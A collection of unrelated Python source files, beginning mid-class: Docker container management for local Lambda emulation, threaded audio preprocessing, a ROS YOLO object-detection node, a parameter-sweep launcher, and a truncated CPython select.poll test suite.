self._memory_limit_mb = memory_limit_mb self._network_id = None self._container_opts = container_opts self._additional_volumes = additional_volumes self._logs_thread = None # Use the given Docker client or create new one self.docker_client = docker_client or docker.from_env() # Runtime properties of the container. They won't have value until container is created or started self.id = None # aws-lambda-rie defaults to 8080 as the port, however that's a common port. A port is chosen by # selecting the first free port in a range that's not ephemeral. self._start_port_range = 5000 self._end_port_range = 9000 try: self.rapid_port_host = find_free_port(start=self._start_port_range, end=self._end_port_range) except NoFreePortsError as ex: raise ContainerNotStartableException(str(ex)) from ex def create(self): """ Calls Docker API to creates the Docker container instance. Creating the container does *not* run the container. Use ``start`` method to run the container :return string: ID of the created container :raise RuntimeError: If this method is called after a container already has been created """ if self.is_created(): raise RuntimeError("This container already exists. Cannot create again.") _volumes = {} if self._host_dir: LOG.info("Mounting %s as %s:ro,delegated inside runtime container", self._host_dir, self._working_dir) _volumes = { self._host_dir: { # Mount the host directory as "read only" directory inside container at working_dir # https://docs.docker.com/storage/bind-mounts # Mount the host directory as "read only" inside container "bind": self._working_dir, "mode": "ro,delegated", } } kwargs = { "command": self._cmd, "working_dir": self._working_dir, "volumes": _volumes, # We are not running an interactive shell here. "tty": False, # Set proxy configuration from global Docker config file "use_config_proxy": True, } if self._container_opts: kwargs.update(self._container_opts) if self._additional_volumes: kwargs["volumes"].update(self._additional_volumes) # Make sure all mounts are of posix path style. kwargs["volumes"] = {to_posix_path(host_dir): mount for host_dir, mount in kwargs["volumes"].items()} if self._env_vars: kwargs["environment"] = self._env_vars kwargs["ports"] = {self.RAPID_PORT_CONTAINER: ("127.0.0.1", self.rapid_port_host)} if self._exposed_ports: kwargs["ports"].update( {container_port: ("127.0.0.1", host_port) for container_port, host_port in self._exposed_ports.items()} ) if self._entrypoint: kwargs["entrypoint"] = self._entrypoint if self._memory_limit_mb: # Ex: 128m => 128MB kwargs["mem_limit"] = "{}m".format(self._memory_limit_mb) if self.network_id == "host": kwargs["network_mode"] = self.network_id real_container = self.docker_client.containers.create(self._image, **kwargs) self.id = real_container.id self._logs_thread = None if self.network_id and self.network_id != "host": try: network = self.docker_client.networks.get(self.network_id) network.connect(self.id) except DockerNetworkNotFound: # stop and delete the created container before raising the exception real_container.remove(force=True) raise return self.id def stop(self, time=3): """ Stop a container, with a given number of seconds between sending SIGTERM and SIGKILL. Parameters ---------- time Optional. Number of seconds between SIGTERM and SIGKILL. Effectively, the amount of time the container has to perform shutdown steps. Default: 3 """ if not self.is_created(): LOG.debug("Container was not created, cannot run stop.") return try: self.docker_client.containers.get(self.id).stop(timeout=time) except docker.errors.NotFound: # Container is already removed LOG.debug("Container with ID %s does not exist. Cannot stop!", self.id) except docker.errors.APIError as ex: msg = str(ex) removal_in_progress = ("removal of container" in msg) and ("is already in progress" in msg) # When removal is already started, Docker API will throw an exception # Skip such exceptions and log if not removal_in_progress: raise ex LOG.debug("Container removal is in progress, skipping exception: %s", msg) def delete(self): """ Removes a container that was created earlier. """ if not self.is_created(): LOG.debug("Container was not created. Skipping deletion") return try: self.docker_client.containers.get(self.id).remove(force=True) # Remove a container, even if it is running except docker.errors.NotFound: # Container is already not there LOG.debug("Container with ID %s does not exist. Skipping deletion", self.id) except docker.errors.APIError as ex: msg = str(ex) removal_in_progress = ("removal of container" in msg) and ("is already in progress" in msg) # When removal is already started, Docker API will throw an exception # Skip such exceptions and log if not removal_in_progress: raise ex LOG.debug("Container removal is in progress, skipping exception: %s", msg) self.id = None def start(self, input_data=None): """ Calls Docker API to start the container. The container must be created at the first place to run. It waits for the container to complete, fetches both stdout and stderr logs and returns through the given streams. Parameters ---------- input_data Optional. Input data sent to the container through container's stdin. """ if input_data: raise ValueError("Passing input through container's stdin is not supported") if not self.is_created(): raise RuntimeError("Container does not exist. Cannot start this container") # Get the underlying container instance from Docker API real_container = self.docker_client.containers.get(self.id) # Start the container real_container.start() @retry(exc=requests.exceptions.RequestException, exc_raise=ContainerResponseException) def wait_for_http_response(self, name, event, stdout): # TODO(sriram-mv): `aws-lambda-rie` is in a mode where the function_name is always "function" # NOTE(sriram-mv): There is a connection timeout set on the http call to `aws-lambda-rie`, however there is not # a read time out for the response received from the server. resp = requests.post( self.URL.format(port=self.rapid_port_host, function_name="function"), data=event.encode("utf-8"), timeout=(self.RAPID_CONNECTION_TIMEOUT, None), ) stdout.write(resp.content) def wait_for_result(self, name, event, stdout, stderr): # NOTE(sriram-mv): Let logging happen in its own thread, so that a http request can be sent. # NOTE(sriram-mv): All logging is re-directed to stderr, so that only the lambda function return # will be written to stdout. # the log thread will not be closed until the container itself got deleted, # so as long as the container is still there, no need to start a new log thread if not self._logs_thread or not self._logs_thread.is_alive(): self._logs_thread = threading.Thread(target=self.wait_for_logs, args=(stderr, stderr), daemon=True) self._logs_thread.start() self.wait_for_http_response(name, event, stdout) def wait_for_logs(self, stdout=None, stderr=None): # Return instantly if we don't have to fetch any logs if not stdout and not stderr: return if not self.is_created(): raise RuntimeError("Container does not exist. Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) # Fetch both stdout and stderr streams from Docker as a single iterator. logs_itr = real_container.attach(stream=True, logs=True, demux=True) self._write_container_output(logs_itr, stdout=stdout, stderr=stderr) def copy(self, from_container_path, to_host_path): if not self.is_created(): raise RuntimeError("Container does not exist. Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) LOG.debug("Copying from container: %s -> %s", from_container_path, to_host_path) with tempfile.NamedTemporaryFile() as fp: tar_stream, _ = real_container.get_archive(from_container_path) for data in tar_stream: fp.write(data) # Seek the handle back to start of file for tarfile to use fp.seek(0) with tarfile.open(fileobj=fp, mode="r") as tar: tar.extractall(path=to_host_path) @staticmethod def _write_container_output(output_itr, stdout=None, stderr=None): """ Based on the data returned from the Container output, via the iterator, write it to the appropriate streams Parameters ---------- output_itr: Iterator Iterator returned by the Docker Attach command stdout: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stdout data from Container into stderr: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stderr data from the Container into """ # Iterator returns a tuple of (stdout, stderr) for stdout_data, stderr_data in output_itr: if stdout_data and stdout: stdout.write(stdout_data) if stderr_data and stderr: stderr.write(stderr_data) @property def network_id(self): """ Gets the ID of the network this container connects to :return string: ID of the network """ return self._network_id @network_id.setter def network_id(self, value): """ Set the ID of network that this container should connect to :param string value: Value of the network ID """ self._network_id = value @property def image(self): """ Returns the image used by this container :return string: Name of the container image """ return self._image def is_created(self): """ Checks if the real container exists? Returns ------- bool True if the container is created """ if self.id: try: self.docker_client.containers.get(self.id) return True except docker.errors.NotFound: return False return False def is_running(self): """ Checks if the real container status is running Returns ------- bool True if the container is running """ try: real_container = self.docker_client.containers.get(self.id) return real_container.status == "running" except docker.errors.NotFound: return False
data_prepro_parallel.py
# -*- coding: utf-8 -*- # !/usr/bin/env python from __future__ import absolute_import from __future__ import division from __future__ import print_function import argparse import glob import os import sys import threading sys.path.append('.') from audio import prepro_audio nthreads = 20 class StoppableThread(threading.Thread): """Thread class with a stop() method. The thread itself has to check regularly for the stopped() condition.""" def __init__(self, target, args): super(StoppableThread, self).__init__(target=target, args=args) self._stop_event = threading.Event() def stop(self): self._stop_event.set() def stopped(self): return self._stop_event.is_set() class ThreadsafeIter: """Takes an iterator/generator and makes it thread-safe by serializing call to the `next` method of given iterator/generator. """ def __init__(self, it): self.it = it self.lock = threading.Lock() def __iter__(self): return self def next(self): with self.lock: return self.it.next() class Audio: def __init__(self, src_dir, tar_dir, format): self.tar_dir = tar_dir self.src_dir = src_dir self.lists = ThreadsafeIter(glob.iglob('{}/*.{}'.format(src_dir, format))) def next(self): src_path = next(self.lists) if src_path is None: raise StopIteration() relpath = os.path.relpath(src_path, self.src_dir) base, _ = os.path.split(relpath) tar_base = os.path.join(self.tar_dir, base) if not os.path.exists(tar_base): os.mkdir(tar_base) tar_path = os.path.join(self.tar_dir, relpath) # exclude extension src_path, _ = os.path.splitext(src_path) tar_path, _ = os.path.splitext(tar_path) return src_path, tar_path def do_task(nthreads, audio, format, sr, db): print('Thread-{} start.\n'.format(nthreads)) try: while True: src_path, tar_path = audio.next() src_path = '{}.{}'.format(src_path, format) tar_path = '{}.{}'.format(tar_path, 'wav') prepro_audio(src_path, tar_path, sr=sr, format=format, db=db) except StopIteration: print('Thread-{} done.\n'.format(nthreads)) if __name__ == '__main__': # get arguments parser = argparse.ArgumentParser() parser.add_argument('src_dir', type=str, help='source directory path.') parser.add_argument('tar_dir', type=str, help='target directory path.') parser.add_argument('-format', type=str, default='wav', help='audio format: wav/mp3/flv/ogg/raw. default is wav.') parser.add_argument('-sr', type=int, help='sample rate.') parser.add_argument('-db', type=int, help='average decibel.') args = parser.parse_args() print(str(args)) if not os.path.exists(args.tar_dir): os.mkdir(args.tar_dir) audio = Audio(args.src_dir, args.tar_dir, args.format) threads = [StoppableThread(target=do_task, args=(i, audio, args.format, args.sr, args.db)) for i in range(nthreads)] for t in threads: t.start() for t in threads: t.join() print('done.')
detection_node.py
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- import os os.environ["DARKNET_PATH"] = "/workspace/src/dependencies/darknet/" import rospy from sensor_msgs.msg import PointCloud2, Image, CameraInfo, PointCloud, PointField from geometry_msgs.msg import Point32, Point, PoseStamped, Pose, Twist import numpy as np import time from threading import Thread, Event import cv2 from cv_bridge import CvBridge, CvBridgeError import darknet import json import random from std_msgs.msg import String, Header, Int64 import sensor_msgs.point_cloud2 as pc2 import std_msgs.msg import tf import message_filters #import pcl from std_msgs.msg import Float32, Int64 from robobreizh.msg import CloudIndexed, CloudSources, GraspConfigList, DetectedObj, GraspConfig, BoundingBoxCoord from robobreizh.srv import detect_grasps, object_detection class ObjectsDetection(): def __init__(self): rospy.init_node('ObjectsDetectionNode', anonymous=False) self.darknet_config_dir = os.path.join(os.environ.get('DARKNET_PATH', './'), "darknet_config/") self.config_file = self.darknet_config_dir+"yolov4-tiny-obj.cfg" self.data_file = self.darknet_config_dir+"obj.data" self.weights = self.darknet_config_dir+"yolov4-tiny-obj_last.weights" random.seed(3) # deterministic bbox colors self.network, self.class_names, self.class_colors = darknet.load_network( self.config_file, self.data_file, self.weights, batch_size=1 ) self.bridge = CvBridge() self.listener = tf.TransformListener() self.object_pose = [0,0,0,0] self.cloud_points = [] # PUBLISHERS self.detect_pub = rospy.Publisher('/detected_object', String, queue_size=10) self.visualize_detect_pub = rospy.Publisher('/visualize_pointcloud', PointCloud2, queue_size=10) self.object_pc_pub = rospy.Publisher("crop_pointcloud", PointCloud2, queue_size=10) self.cloud_index_pub = rospy.Publisher("gpd_cloud_indexed", CloudIndexed, queue_size=10) # The following ones are unusued for now self.cropped_depth_image_pub = rospy.Publisher("cropped_depth_image", Image, queue_size=10) self.cropped_rgb_image_pub = rospy.Publisher("cropped_rgb_image", Image, queue_size=10) self.cropped_camera_info = rospy.Publisher("cropped_camera_info", CameraInfo, queue_size=10) # SUBSCRIBERS self.image_sub = message_filters.Subscriber('/hsrb/head_rgbd_sensor/rgb/image_rect_color', Image) self.pointcloud_sub = message_filters.Subscriber('/hsrb/head_rgbd_sensor/depth_registered/rectified_points', PointCloud2) self.depth_sub = message_filters.Subscriber('/hsrb/head_rgbd_sensor/depth_registered/image_rect_raw', Image) def continuous_node(self): # publisher_thread = Thread(target=self.object_thread) # publisher_thread.start() ts = message_filters.TimeSynchronizer([self.image_sub, self.pointcloud_sub, self.depth_sub], 10) ts.registerCallback(self.callback) rospy.loginfo("Launching Detection Node") rospy.spin() #publisher_thread.join() def service_node(self): s = rospy.Service('object_detection', object_detection, self.handle_object_detection) rospy.loginfo("Object Detection Service Node: Waiting for Request...") rospy.spin() def handle_object_detection(self, req): return self.main_loop() def detect_dummy_object(): image_data = rgbd.get_image() points_data = rgbd.get_points() h_image = rgbd.get_h_image() rgbd.set_h(130, 140) region = rgbd.get_region() interact(f, lower=(0, 255, 5), upper=(0, 255, 5)) def main_loop(self): image_sub = rospy.wait_for_message('/hsrb/head_rgbd_sensor/rgb/image_rect_color', Image) pointcloud_sub = rospy.wait_for_message('/hsrb/head_rgbd_sensor/depth_registered/rectified_points', PointCloud2) depth_sub = rospy.wait_for_message('/hsrb/head_rgbd_sensor/depth_registered/image_rect_raw', Image) image_name = self.bridge.imgmsg_to_cv2(image_sub) image, detections = self.image_detection(image_name, self.network, self.class_names, self.class_colors) darknet.print_detections(detections, False) # Uncomment to visualize detection in real time (ressource consuming) # cv2.imshow('Inference', image) # cv2.waitKey(1) detected_obj = {} points = [] point_clouds = [] labels = [] bounding_boxes = [] threshold = 40.0 for obj in detections: if (float(obj[1]) > threshold): #Check if the confidence is above a threshold labels.append(String(obj[0])) x, y, w, h = obj[2][0], obj[2][1], obj[2][2], obj[2][3] boundingbox = BoundingBoxCoord() x_min, y_min, x_max, y_max = self.convertBack(x,y,w,h) boundingbox.x_min, boundingbox.y_min, boundingbox.x_max, boundingbox.y_max = (Int64(x) for x in self.convertBack(x,y,w,h)) bounding_boxes.append(boundingbox) points.append([int(x), int(y)]) #pc = self.crop_object_pointcloud(x_min, y_min, x_max, y_max, [x,y], pointcloud_sub) #point_clouds.append(pc) if not labels: final_msg = DetectedObj() final_msg.object_names = [String("nothing")] return final_msg poses = self.estimate_pose(points, pointcloud_sub) print(points) obj_poseXYZ = [] for pos in poses: temp = Pose() temp.position.x = pos[0] temp.position.y = pos[1] temp.position.z = pos[2] obj_poseXYZ.append(temp) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1), ] header = Header() header.stamp = rospy.Time.now() poses_msg = pc2.create_cloud(header, fields, poses) self.visualize_detect_pub.publish(poses_msg) final_msg = DetectedObj() final_msg.object_names = labels final_msg.objects_bb = bounding_boxes final_msg.object_poses = poses_msg final_msg.cloud = pointcloud_sub final_msg.object_posesXYZ = obj_poseXYZ print(obj_poseXYZ) return final_msg def estimate_pose(self, points, pointcloud_sub): res = [] gen = pc2.read_points(pointcloud_sub, field_names=("x", "y", "z"), skip_nans=True, uvs=points) for p in gen: res.append(p) return res ######################################################## ### UNUSUED ### ######################################################## def crop_object_pointcloud(self, min_x, min_y, max_x, max_y, center_coord, pointcloud_sub): points = [] for i in range(min_x, max_x): for j in range(min_y, max_y): points.append([i, j]) center_coord = [int(round(center_coord[0])), int(round(center_coord[1]))] points = list(pc2.read_points(pointcloud_sub, field_names=("x", "y", "z", "rgb"), skip_nans=True, uvs=points)) center = list(pc2.read_points(pointcloud_sub, field_names=("x", "y", "z"), skip_nans=True, uvs=[center_coord, [0,0]]))[0] pcl_data = pcl.PointCloud_PointXYZRGB() pcl_data.from_list(points) objects_cloud = self.use_ransac(pcl_data) colorless_cloud = XYZRGB_to_XYZ(objects_cloud) clusters = self.clustering(colorless_cloud) # # Get groups of indices for each cluster of points # # Each group of points belongs to the same object # # This is effectively a list of lists, with each list containing indices of the cloud # #clusters = self.get_clusters(colorless_cloud, tolerance = 0.05, min_size = 100, max_size = 1000) final_points = [] # r = randint(0, 255) # g = randint(0, 255) # b = randint(0, 255) # No clustering if there is only one cluster for speedup if len(clusters) == 1: final_points = np.array(objects_cloud) else: # We get the points belonging to each clusters # Two methods: # 1. Get the cluster where the center point of the bounding box belong # 2. Get the biggest size cluster (most likely the object) method = "2" # Method 1 if method == "1": pt_index = "" center = [round(x) for x in center] colorless_cloud_round = [] for pt in colorless_cloud: pt_round = [round(x) for x in pt] colorless_cloud_round.append(pt_round) for i in range(len(colorless_cloud_round)): if center == colorless_cloud_round[i]: pt_index = i for cluster in clusters: if pt_index in cluster: for c, i in enumerate(cluster): x, y, z, rgb = objects_cloud[i][0], objects_cloud[i][1], objects_cloud[i][2], objects_cloud[i][3] final_points.append([x, y, z, rgb]) break # Method 2 else: max_size = 0 max_cluster = [] for cluster in clusters: if len(cluster) > max_size: max_cluster = cluster max_size = len(cluster) for c, i in enumerate(max_cluster): x, y, z, rgb = objects_cloud[i][0], objects_cloud[i][1], objects_cloud[i][2], objects_cloud[i][3] final_points.append([x, y, z, rgb]) # fields = [PointField('x', 0, PointField.FLOAT32, 1), # PointField('y', 4, PointField.FLOAT32, 1), # PointField('z', 8, PointField.FLOAT32, 1), # PointField('rgba', 16, PointField.FLOAT32, 1), # ] # header = pointcloud_sub.header # pc_msg = pc2.create_cloud(header, fields, final_points) # pc_msg.header.stamp = rospy.Time.now() # return pc_msg #self.object_pc_pub.publish(pc_msg) clusters_cloud = pcl.PointCloud_PointXYZRGB() clusters_cloud.from_list(final_points) objects_msg = pcl_to_ros(clusters_cloud) return objects_msg def use_ransac(self, points): fil = points.make_passthrough_filter() fil.set_filter_field_name("z") fil.set_filter_limits(0, 1.5) cloud_filtered = fil.filter() seg = cloud_filtered.make_segmenter_normals(ksearch=100) seg.set_optimize_coefficients(True) seg.set_model_type(pcl.SACMODEL_NORMAL_PLANE) seg.set_normal_distance_weight(0.1) seg.set_method_type(pcl.SAC_RANSAC) seg.set_max_iterations(100) seg.set_distance_threshold(0.01) indices, model = seg.segment() object_cloud = cloud_filtered.extract(indices, negative=True) #table_cloud = cloud_filtered.extract(indices, negative=False) return object_cloud def object_thread(self): rate = rospy.Rate(100) # ROS Rate at 100Hz while not rospy.is_shutdown(): # fields = [PointField('x', 0, PointField.FLOAT32, 1), # PointField('y', 4, PointField.FLOAT32, 1), # PointField('z', 8, PointField.FLOAT32, 1), # PointField('rgb', 16, PointField.FLOAT32, 1), # ] # header = Header() # header.stamp = rospy.Time.now() # header.frame_id = "head_rgbd_sensor_rgb_frame" # pc_msg = pc2.create_cloud(header, fields, self.object_pose) # self.object_pc_pub.publish(pc_msg) min_x, min_y, max_x, max_y = self.object_pose points = [] for i in range(min_x, max_x): for j in range(min_y, max_y): points.append(int(i + (j*640))) self.listener.waitForTransform('/map', '/head_rgbd_sensor_rgb_frame', rospy.Time(), rospy.Duration(2.0)) (trans,rot) = self.listener.lookupTransform('/map', '/head_rgbd_sensor_rgb_frame', rospy.Time(0)) point_msg = Point() point_msg.x = trans[0] point_msg.y = trans[1] point_msg.z = trans[2] cloud_source_msg = CloudSources() cloud = rospy.wait_for_message('/hsrb/head_rgbd_sensor/depth_registered/rectified_points', PointCloud2) cloud_source_msg.cloud = cloud cloud_source_msg.camera_source = [int(1)] cloud_source_msg.view_points = [point_msg] cloud_index_msg = CloudIndexed() cloud_index_msg.cloud_sources = cloud_source_msg cloud_index_msg.indices = points self.cloud_index_pub.publish(cloud_index_msg) rate.sleep() def callback(self, image_sub, pointcloud_sub, depth_sub): image_name = self.bridge.imgmsg_to_cv2(image_sub) image, detections = self.image_detection(image_name, self.network, self.class_names, self.class_colors) darknet.print_detections(detections, False) #cv2.imshow('Inference', image) #cv2.waitKey(1) detected_obj = {} points = [] if detections: x, y, w, h = detections[1][2][0], detections[1][2][1], detections[1][2][2], detections[1][2][3] x_start, y_start, x_end, y_end = self.convertBack(x,y,w,h) # depth_im = self.crop_image(x_start, y_start, x_end, y_end, self.bridge.imgmsg_to_cv2(depth_sub, "16UC1")) # rgb_img = self.crop_image(x_start, y_start, x_end, y_end, self.bridge.imgmsg_to_cv2(image_sub, "bgr8")) # rgb_msg = self.bridge.cv2_to_imgmsg(rgb_img, "bgr8") # depth_msg = self.bridge.cv2_to_imgmsg(depth_im, "16UC1") #publish camera info topic on the new size # camera_info_msg = rospy.wait_for_message("/hsrb/head_rgbd_sensor/depth_registered/camera_info", CameraInfo) # camera_info_msg.width = w # camera_info_msg.height = h # camera_info_msg.header = std_msgs.msg.Header() # camera_info_msg.header.stamp = rospy.Time.now() # self.cropped_depth_image_pub.publish(depth_msg) # self.cropped_rgb_image_pub.publish(rgb_msg) # self.cropped_camera_info.publish(camera_info_msg) #self.create_cloud_indexed(x_start, y_start, x_end, y_end, pointcloud_sub) #self.crop_pointcloud(x_start, y_start, x_end, y_end, [x,y], pointcloud_sub) # self.object_pose = [x_start, y_start, x_end, y_end] # self.cloud_points = pointcloud_sub msg = self.create_cloud_indexed([x_start, y_start, x_end, y_end], pointcloud_sub) rospy.wait_for_service('/detect_grasps_server/detect_grasps') grasp_service = rospy.ServiceProxy('/detect_grasps_server/detect_grasps', detect_grasps) try: resp = grasp_service(msg) except rospy.ServiceException as exc: print("Service did not process request: " + str(exc)) print(resp.grasp_configs.grasps[0]) for obj in detections: x, y, w, h = obj[2][0], obj[2][1], obj[2][2], obj[2][3] points.append([int(x), int(y)]) poses = self.estimate_pose(points, pointcloud_sub) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1), ] header = pointcloud_sub.header pc_msg = pc2.create_cloud(header, fields, poses) pc_msg.header.stamp = rospy.Time.now() self.visualize_detect_pub.publish(pc_msg) i = 0 for obj in detections: detected_obj[obj[0]] = poses[i] i = i+1 detected_obj_msg = json.dumps(detected_obj) self.detect_pub.publish(detected_obj_msg) if not detected_obj and time_elapsed >= 10: return False # for obj in detected_obj: # br = tf.TransformBroadcaster() # br.sendTransform(detected_obj[obj], tf.transformations.quaternion_from_euler(0, 0, 0), rospy.Time.now(), obj, 'head_rgbd_sensor_rgb_frame') def crop_pointcloud(self, min_x, min_y, max_x, max_y, center_coord, pointcloud_sub): points = [] for i in range(min_x, max_x): for j in range(min_y, max_y): points.append([i, j]) points = list(pc2.read_points(pointcloud_sub, field_names=("x", "y", "z", "rgb"), skip_nans=True, uvs=points)) # fields = [PointField('x', 0, PointField.FLOAT32, 1), # PointField('y', 4, PointField.FLOAT32, 1), # PointField('z', 8, PointField.FLOAT32, 1), # PointField('rgb', 16, PointField.FLOAT32, 1), # ] # header = Header() # pc_msg = pc2.create_cloud(header, fields, points) # pc_msg.header.stamp = rospy.Time.now() # pc_msg.header.frame_id = "head_rgbd_sensor_rgb_frame" self.object_pose = points #self.object_pc_pub.publish(pc_msg) def clustering(self, cloud): # vg = cloud.make_voxel_grid_filter() # vg.set_leaf_size(0.01, 0.01, 0.01) # cloud_filtered = vg.filter() # nr_points = cloud_filtered.size # print(nr_points) # Creating the KdTree object for the search method of the extraction tree = cloud.make_kdtree() ec = cloud.make_EuclideanClusterExtraction() ec.set_ClusterTolerance (0.005) ec.set_MinClusterSize (10) ec.set_MaxClusterSize (1000) ec.set_SearchMethod (tree) cluster_indices = ec.Extract() #print('cluster_indices : ' + str(cluster_indices[0])) return cluster_indices # This pipeline separates the objects in the table from the given scene def split_cloud(self, cloud): # Downsample the cloud as high resolution which comes with a computation cost downsampled_cloud = do_voxel_grid_filter(point_cloud = cloud, LEAF_SIZE = 0.01) # Get only information in our region of interest as we don't care about the other parts filtered_cloud = do_passthrough_filter(point_cloud = downsampled_cloud, name_axis = 'z', min_axis = 0.6, max_axis = 1.1) # Separate the table from everything else table_cloud, objects_cloud = do_ransac_plane_segmentation(filtered_cloud, max_distance = 0.01) return objects_cloud, table_cloud # This pipeline returns groups of indices for each cluster of points # Each cluster of indices is grouped as belonging to the same object # This uses DBSCAN Algorithm Density-Based Spatial Clustering of Applications with noise # Aka Eucledian clustering to group points def get_clusters(self, cloud, tolerance, min_size, max_size): tree = cloud.make_kdtree() extraction_object = cloud.make_EuclideanClusterExtraction() extraction_object.set_ClusterTolerance(tolerance) extraction_object.set_MinClusterSize(min_size) extraction_object.set_MaxClusterSize(max_size) extraction_object.set_SearchMethod(tree) # Get clusters of indices for each cluster of points, each cluster belongs to the same object # 'clusters' is effectively a list of lists, with each list containing indices of the cloud clusters = extraction_object.Extract() return clusters def image_detection(self, image, network, class_names, class_colors, thresh=0.25): # Darknet doesn't accept numpy images. # Create one with image we reuse for each detect # width = darknet.network_width(network) # height = darknet.network_height(network) width = 640 height = 480 height = darknet.network_height(network) darknet_image = darknet.make_image(width, height, 3) image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image_resized = cv2.resize(image_rgb, (width, height), interpolation=cv2.INTER_LINEAR) darknet.copy_image_from_bytes(darknet_image, image_resized.tobytes()) detections = darknet.detect_image( network, class_names, darknet_image, thresh=thresh) darknet.free_image(darknet_image) image = darknet.draw_boxes(detections, image_resized, class_colors) return cv2.cvtColor(image, cv2.COLOR_BGR2RGB), detections def convertBack(self, x, y, w, h): xmin = int(round(x - (w / 2))) xmax = int(round(x + (w / 2))) ymin = int(round(y - (h / 2))) ymax = int(round(y + (h / 2))) return xmin, ymin, xmax, ymax def crop_image(self, min_x, min_y, max_x, max_y, image): image_cropped = image[min_y:max_y, min_x:max_x] return image_cropped def get_depth(self, x, y): gen = pc2.read_points(self.pc, field_names='z', skip_nans=False, uvs=[(x, y)]) return next(gen) def create_pointcloudXYZRGB(self, rgb_img, depth_im, camera_info): self.depth = img.frombytes("F", (depth_im.width, depth_im.height), depth_im.data) lookup_depth = self.depth.load() points = [] self.model.fromCameraInfo(camera_info.data) for i in range(depth_im.width): for j in range(depth_im.heigth): depth = lookup_depth[i, j] ray = self.model.projectPixelTo3dRay(tuple([i,j])) ray_z = [el / ray[2] for el in ray] # normalize the ray so its Z-component equals 1.0 pt = [el * depth for el in ray_z] # multiply the ray by the depth; its Z-component should now equal the depth value points.append(pt) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1), ] header = Header() header.stamp = rospy.Time.now() header.frame_id = "head_rgbd_sensor_rgb_frame" self.object_pc_pub = point_cloud2.create_cloud(header, fields, points) self.object_pc_pub.header.stamp = rospy.Time.now() pub.publish(self.object_pc_pub) def compute_box_coordinates(self, x1, y1, w_size, h_size): x_top_left = int(round(x1 - (w_size/2))) y_top_left = int(round(y1 - (h_size/2))) x_bottom_right = int(round(x_start + w_size)) y_bottom_right = int(round(y_start + h_size)) x_top_right = x_bottom_right y_top_right = y_top_left x_bottom_left = x_top_left y_bottom_left = y_bottom_right return [(x_top_left, y_top_left), (x_top_right, y_top_right), (x_bottom_right, y_bottom_right), (x_bottom_left, y_bottom_left)] if __name__ == "__main__": obj_detection_node = ObjectsDetection() # Here you can switch between two mode: # 1. Continuous detection by ROS subscriber/callback (asynchronous) # 2. Synchronous detection via ROS Service (Server/Client-like) #obj_detection_node.continuous_node() obj_detection_node.service_node()
PT_KP.py
from itertools import product import os import threading import time def thread_function(conf): time.sleep(1) print(conf) os.system(f"Python ./RunInstance.py {' '.join(map(str,conf.values()))}") parameters = {"Method": ["average", "extreme"], "W": [5,25], "Pmin": [0.1,0.2], "Alpha": [0.1, 0.5, 0.9]} configurations = [dict(zip(parameters, v)) for v in product(*parameters.values())] for c in configurations: x = threading.Thread(target=thread_function, args=(c,)) x.start()
test_poll.py
# Test case for the os.poll() function import os import subprocess import random import select import threading import time import unittest from test.support import TESTFN, run_unittest, reap_threads, cpython_only try: select.poll except AttributeError: raise unittest.SkipTest("select.poll not defined") def find_ready_matching(ready, flag): match = [] for fd, mode in ready: if mode & flag: match.append(fd) return match class PollTests(unittest.TestCase): def test_poll1(self): # Basic functional test of poll object # Create a bunch of pipe and test that poll works with them. p = select.poll() NUM_PIPES = 12 MSG = b" This is a test." MSG_LEN = len(MSG) readers = [] writers = [] r2w = {} w2r = {} for i in range(NUM_PIPES): rd, wr = os.pipe() p.register(rd) p.modify(rd, select.POLLIN) p.register(wr, select.POLLOUT) readers.append(rd) writers.append(wr) r2w[rd] = wr w2r[wr] = rd bufs = [] while writers: ready = p.poll() ready_writers = find_ready_matching(ready, select.POLLOUT) if not ready_writers: raise RuntimeError("no pipes ready for writing") wr = random.choice(ready_writers) os.write(wr, MSG) ready = p.poll() ready_readers = find_ready_matching(ready, select.POLLIN) if not ready_readers: raise RuntimeError("no pipes ready for reading") rd = random.choice(ready_readers) buf = os.read(rd, MSG_LEN) self.assertEqual(len(buf), MSG_LEN) bufs.append(buf) os.close(r2w[rd]) ; os.close( rd ) p.unregister( r2w[rd] ) p.unregister( rd ) writers.remove(r2w[rd]) self.assertEqual(bufs, [MSG] * NUM_PIPES) def test_poll_unit_tests(self): # returns NVAL for invalid file descriptor FD, w = os.pipe() os.close(FD) os.close(w) p = select.poll() p.register(FD) r = p.poll() self.assertEqual(r[0], (FD, select.POLLNVAL)) with open(TESTFN, 'w') as f: fd = f.fileno() p = select.poll() p.register(f) r = p.poll() self.assertEqual(r[0][0], fd) r = p.poll() self.assertEqual(r[0], (fd, select.POLLNVAL)) os.unlink(TESTFN) # type error for invalid arguments p = select.poll() self.assertRaises(TypeError, p.register, p) self.assertRaises(TypeError, p.unregister, p) # can't unregister non-existent object p = select.poll() self.assertRaises(KeyError, p.unregister, 3) # Test error cases pollster = select.poll() class Nope: pass class Almost: def fileno(self): return 'fileno' self.assertRaises(TypeError, pollster.register, Nope(), 0) self.assertRaises(TypeError, pollster.register, Almost(), 0) # Another test case for poll(). This is copied from the test case for # select(), modified to use poll() instead. def test_poll2(self): cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done' proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, bufsize=0) proc.__enter__() self.addCleanup(proc.__exit__, None, None, None) p = proc.stdout pollster = select.poll() pollster.register( p, select.POLLIN ) for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10: fdlist = pollster.poll(tout) if (fdlist == []): continue fd, flags = fdlist[0] if flags & select.POLLHUP: line = p.readline() if line != b"": self.fail('error: pipe seems to be closed, but still returns data') continue elif flags & select.POLLIN: line = p.readline() if not line: break self.assertEqual(line, b'testing...\n') continue else: self.fail('Unexpected return value from select.poll: %s' % fdlist) def test_poll3(self): # test int overflow pollster = select.poll() pollster.register(1) self.assertRaises(OverflowError, pollster.poll, 1 << 64) x = 2 + 3 if x != 5: self.fail('Overflow must have occurred') # Issues 